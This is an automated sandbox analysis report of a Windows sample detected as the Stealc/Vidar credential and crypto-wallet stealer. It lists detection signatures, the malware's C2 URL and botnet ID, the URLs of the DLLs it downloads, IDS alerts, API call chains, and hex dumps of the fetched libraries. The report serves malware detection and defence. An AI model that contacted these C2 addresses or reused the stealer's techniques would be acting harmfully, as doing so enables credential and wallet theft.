Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532570
MD5: c582a9038fe13bfcf8c7f11db6a6877a
SHA1: 50ad639757744808ab570da6229ddfe1cd4ed432
SHA256: a4df7d0b5f032022d53e71a0935fe2035eb79c12cef9237a1cd8a2b583f3849e
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll URL Reputation: Label: malware
Found malware configuration
Source: 0.2.file.exe.970000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.970000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00979B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00979B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0097C820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00979AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00979AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00977240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00977240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00988EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00988EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C5D6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00984910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00984910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0097DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0097E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0097F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00983EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00983EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009716D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0097BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_009838B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0097ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00984570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00984570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0097DE10
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 